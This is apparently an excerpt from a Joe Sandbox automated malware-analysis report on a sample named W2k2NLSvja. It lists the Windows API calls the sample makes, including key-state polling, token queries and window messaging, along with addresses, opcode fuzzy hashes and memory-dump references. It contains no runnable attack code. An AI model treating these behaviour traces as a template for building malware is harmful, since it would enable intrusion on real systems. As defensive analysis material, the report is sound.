                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1389676194-0
                                                                                                                        • Opcode ID: adab58127cc7a2465205698b4323d37c6873e1bd2b0ffcb48da9bfdb31cf8664
                                                                                                                        • Instruction ID: e65c65cb84a1eb958606bf46f2f9c5fc3cd95a2c83fb50cade3bf6056c64fe26
                                                                                                                        • Opcode Fuzzy Hash: adab58127cc7a2465205698b4323d37c6873e1bd2b0ffcb48da9bfdb31cf8664
                                                                                                                        • Instruction Fuzzy Hash: 6B512A35A00205DFCB11EF65C985AAEBBF5EF09310F188099E849AB362CB75ED11EB50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fdaa9037a2a3d1a4e6bdba098b738d8d9a45755dddc0e9af395de3f819af49c3
                                                                                                                        • Instruction ID: 1480250164bc08ce810f631d5d7df3a3858071b7941f6b7d4492321b4d81843f
                                                                                                                        • Opcode Fuzzy Hash: fdaa9037a2a3d1a4e6bdba098b738d8d9a45755dddc0e9af395de3f819af49c3
                                                                                                                        • Instruction Fuzzy Hash: 8341C275A00304EBF762DB2CCC44FA9BBA4FB09310F0582A5FA95A72D1DBB5A9419B50
                                                                                                                        APIs
                                                                                                                        • GetCursorPos.USER32(?), ref: 00F82357
                                                                                                                        • ScreenToClient.USER32(010467B0,?), ref: 00F82374
                                                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00F82399
                                                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00F823A7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4210589936-0
                                                                                                                        • Opcode ID: 8453a2fb31d35165628065898f32a555fa7028906fcd9aead503a95213f84280
                                                                                                                        • Instruction ID: 0301f35bc6cac829817e39c7aaedd8c535e9eb80ea04b342fcc739e7e5085fce
                                                                                                                        • Opcode Fuzzy Hash: 8453a2fb31d35165628065898f32a555fa7028906fcd9aead503a95213f84280
                                                                                                                        • Instruction Fuzzy Hash: FF417F7590411AFBDF299FA9C844AEEBB74FB05320F20431AF868A2290C7356954EFD1
                                                                                                                        APIs
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FD695D
                                                                                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00FD69A9
                                                                                                                        • TranslateMessage.USER32(?), ref: 00FD69D2
                                                                                                                        • DispatchMessageW.USER32(?), ref: 00FD69DC
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FD69EB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2108273632-0
                                                                                                                        • Opcode ID: f49a0f6ac76d5a1e526ac76474ff711ae0b28e5c6dbc3dde6648120913fb2226
                                                                                                                        • Instruction ID: d72774a0235a88d788294100756038abc2f19f5e73a6a1291846ded2f1015f58
                                                                                                                        • Opcode Fuzzy Hash: f49a0f6ac76d5a1e526ac76474ff711ae0b28e5c6dbc3dde6648120913fb2226
                                                                                                                        • Instruction Fuzzy Hash: BE31E7B1900206ABDB30DF74DC84BB67BA9AB06320F184167E4A1D3295E73F9845F751
                                                                                                                        APIs
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00FD8F12
                                                                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00FD8FBC
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00FD8FC4
                                                                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00FD8FD2
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00FD8FDA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3382505437-0
                                                                                                                        • Opcode ID: a9390e74661093189f8f8a7f982c9f3dfb0b50399198e9c93290c0295b2caf93
                                                                                                                        • Instruction ID: 3cf388f1bb1afe3900442723c5e05156cec70654024026ecfae3a415a2d8abb9
                                                                                                                        • Opcode Fuzzy Hash: a9390e74661093189f8f8a7f982c9f3dfb0b50399198e9c93290c0295b2caf93
                                                                                                                        • Instruction Fuzzy Hash: 8131E071900219EFDB20CF68D94CA9E7BB6EB04325F14421AF964E72C0C7B49911EB90
                                                                                                                        APIs
                                                                                                                        • IsWindowVisible.USER32(?), ref: 00FDB6C7
                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00FDB6E4
                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00FDB71C
                                                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00FDB742
                                                                                                                        • _wcsstr.LIBCMT ref: 00FDB74C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3902887630-0
                                                                                                                        • Opcode ID: 2367231f9bc67cf8dfd7a14272861273b7a9c35a5d0407073c73485607937f82
                                                                                                                        • Instruction ID: ea435ace71b1954b68250234d1abfd63e151849d68766ff187da7d6d7d48ecb6
                                                                                                                        • Opcode Fuzzy Hash: 2367231f9bc67cf8dfd7a14272861273b7a9c35a5d0407073c73485607937f82
                                                                                                                        • Instruction Fuzzy Hash: 7F210772604204FBEB255F399C49E7B7B99DF8A760F05406AFC05CA291EF65CC41B360
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0100B44C
                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0100B471
                                                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0100B489
                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 0100B4B2
                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00FF1184,00000000), ref: 0100B4D0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2294984445-0
                                                                                                                        • Opcode ID: 8eb7114ea0cbdfe4c70a9b0faf6269cfb2fe4b3915a4bc5a9534720075a94ec6
                                                                                                                        • Instruction ID: 4e34e8d8dc8dc22d66dbf6a90b448405e70ce44c0436d0cd7c750c5673d21af2
                                                                                                                        • Opcode Fuzzy Hash: 8eb7114ea0cbdfe4c70a9b0faf6269cfb2fe4b3915a4bc5a9534720075a94ec6
                                                                                                                        • Instruction Fuzzy Hash: F421B575510216AFEB629F38CC44B6A3BA4FB05721F124768FEA6D31D0EB319A11DB80
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FD9802
                                                                                                                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FD9834
                                                                                                                        • __itow.LIBCMT ref: 00FD984C
                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FD9874
                                                                                                                        • __itow.LIBCMT ref: 00FD9885
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$__itow$_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2983881199-0
                                                                                                                        • Opcode ID: 9f3757d1fb23f2384a0d2d5064dc7291624356d791105970e91d77974e7f4d9d
                                                                                                                        • Instruction ID: 2c5c3b4dddae3a7fa8acc7b0550def7438d3bcea91dd5a6589688bf417549ce3
                                                                                                                        • Opcode Fuzzy Hash: 9f3757d1fb23f2384a0d2d5064dc7291624356d791105970e91d77974e7f4d9d
                                                                                                                        • Instruction Fuzzy Hash: 85210D31B04304ABDB20ABB18C86EEE7BA9EF4AB24F480025FD05DB341D6B4DD41B791
                                                                                                                        APIs
                                                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F8134D
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00F8135C
                                                                                                                        • BeginPath.GDI32(?), ref: 00F81373
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00F8139C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3225163088-0
                                                                                                                        • Opcode ID: b75a42cc6725ef722e130f2543272468d6204e0462beaee2437ed6e2c4028110
                                                                                                                        • Instruction ID: d5480f0fb0f6479a5488573777df815a5d28dbde3a41879dbc7680c4c62c8906
                                                                                                                        • Opcode Fuzzy Hash: b75a42cc6725ef722e130f2543272468d6204e0462beaee2437ed6e2c4028110
                                                                                                                        • Instruction Fuzzy Hash: 372162F5C00309DFEB319F25D9447A97BB8FB11322F244319F49496194E77B9892EB90
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memcmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2931989736-0
                                                                                                                        • Opcode ID: 4f4eb7fb5de6a2567564381782b3479ad57023b22cbde1b4b8f78c855bf0f2dd
                                                                                                                        • Instruction ID: 0ef826ffbe9358f1f66ca12e2e7de83ca5ac71607e16cea4e23ee55eb20ceb50
                                                                                                                        • Opcode Fuzzy Hash: 4f4eb7fb5de6a2567564381782b3479ad57023b22cbde1b4b8f78c855bf0f2dd
                                                                                                                        • Instruction Fuzzy Hash: E001DDB2A0422B7BD204A6215C42FAB735DAF123A4F584116FD04D7343E765DE11E3E0
                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00FE4D5C
                                                                                                                        • __beginthreadex.LIBCMT ref: 00FE4D7A
                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00FE4D8F
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00FE4DA5
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00FE4DAC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3824534824-0
                                                                                                                        • Opcode ID: 2c7f18f0daeecfccb331ff6c4f4de93c28ad8af26af301bfaf98cee32971636a
                                                                                                                        • Instruction ID: 66874e34dd4c73cf522e7563d7cedff554d99b731a9f198294040314dc8623c4
                                                                                                                        • Opcode Fuzzy Hash: 2c7f18f0daeecfccb331ff6c4f4de93c28ad8af26af301bfaf98cee32971636a
                                                                                                                        • Instruction Fuzzy Hash: D31144B6904648BBCB318FA89D48ADA7FACEB4A320F144259F954D3240D67A9C0097A1
                                                                                                                        APIs
                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FD8766
                                                                                                                        • GetLastError.KERNEL32(?,00FD822A,?,?,?), ref: 00FD8770
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00FD822A,?,?,?), ref: 00FD877F
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00FD822A,?,?,?), ref: 00FD8786
                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FD879D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 842720411-0
                                                                                                                        • Opcode ID: 6394a46cd6066510711e72b31c62c52e16e3c82de80d4b703daea778ad8c4d81
                                                                                                                        • Instruction ID: 6e7541f6e628c48db2f4820ea96a9914d22a11374d5c4fd6809278aefac2a918
                                                                                                                        • Opcode Fuzzy Hash: 6394a46cd6066510711e72b31c62c52e16e3c82de80d4b703daea778ad8c4d81
                                                                                                                        • Instruction Fuzzy Hash: D0016271A00205BFDB315FB5DC48D677B6DFF8A3A5B200429F849C2250DB329C01EB60
                                                                                                                        APIs
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE5502
                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00FE5510
                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE5518
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00FE5522
                                                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE555E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2833360925-0
                                                                                                                        • Opcode ID: dfc117bbeba44b80496336abc1f71a2bb69f198f9339f8cdcfb3214a39806057
                                                                                                                        • Instruction ID: cc08a61427a3dbac9a0b9864d311abe3b64d6ee95dca7bae1cebde4d17783ffa
                                                                                                                        • Opcode Fuzzy Hash: dfc117bbeba44b80496336abc1f71a2bb69f198f9339f8cdcfb3214a39806057
                                                                                                                        • Instruction Fuzzy Hash: 78016136D04A19DBCF20EFE5E8486EDBB79FB09B19F440056E841F2144DB355550E7A1
                                                                                                                        APIs
                                                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD758C,80070057,?,?,?,00FD799D), ref: 00FD766F
                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD758C,80070057,?,?), ref: 00FD768A
                                                                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD758C,80070057,?,?), ref: 00FD7698
                                                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD758C,80070057,?), ref: 00FD76A8
                                                                                                                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD758C,80070057,?,?), ref: 00FD76B4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3897988419-0
                                                                                                                        • Opcode ID: c30238d050091024e5ab900b8c361f9950a23f23ec05146eccc2c6ed47e202ac
                                                                                                                        • Instruction ID: 9caf116822758b5f5228b3ce9411e8fdf0cad722a0ec9260dbfe7b9512619df9
                                                                                                                        • Opcode Fuzzy Hash: c30238d050091024e5ab900b8c361f9950a23f23ec05146eccc2c6ed47e202ac
                                                                                                                        • Instruction Fuzzy Hash: B901B172600715ABDB21AF18DC04BAA7BAEEB44761F18001AFD04D6205F736DE00ABA0
                                                                                                                        APIs
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FD8608
                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FD8612
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FD8621
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FD8628
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FD863E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 44706859-0
                                                                                                                        • Opcode ID: 3dbbfbc3dbb43d16f0362b013a828170782e42a87750978d84b7a430a00bb5ef
                                                                                                                        • Instruction ID: a9db39a1f797d3c12e537298bf70f08798efd2ef8f54990fcef1be062df4baa3
                                                                                                                        • Opcode Fuzzy Hash: 3dbbfbc3dbb43d16f0362b013a828170782e42a87750978d84b7a430a00bb5ef
                                                                                                                        • Instruction Fuzzy Hash: DEF04431205305AFD7315FA9DC89E6B3BADEF4A7A4F044416F545C7240CB65DC41EB60
                                                                                                                        APIs
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FD8669
                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8673
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8682
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8689
